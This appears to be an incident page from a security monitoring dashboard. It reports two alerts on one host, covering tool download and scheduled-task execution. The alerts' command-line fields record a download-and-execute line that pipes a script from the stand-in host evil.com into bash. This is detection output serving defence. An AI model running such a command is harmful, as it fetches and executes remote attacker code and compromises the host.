Back to list

Medium CINC-20251220-F7B896D6 new

Aggregate ID: aggind:021368f9220b45cdb2760a069897c1c8:13240540813

Incident Overview

Incident ID CINC-20251220-F7B896D6
Severity Medium (70)
Status new
Alert Count 2
Host Count 1

Timeline

First Seen 2025-12-13 20:39:04
Last Seen 2025-12-13 20:39:04
Duration 0d 0h 0m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Command and Control Execution
Techniques:
Ingress Tool Transfer Scheduled Task/Job

Affected Hosts (1)

localhost.localdomain

Related Alerts (2)

Severity Status Hostname Description Tactic Command Line Time
High new localhost.localdomain An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected. Command and Control /bin/sh -c curl http://evil.com/shell|bash 12-13 20:39
High new localhost.localdomain A scheduled task/job has been executed on your host. This could be used by an attacker to execute programs at system startup, or on a scheduled basis for persistence. Please check the process tree to determine if executed commands are malicious or if this was expected behavior. Execution curl http://evil.com/shell 12-13 20:39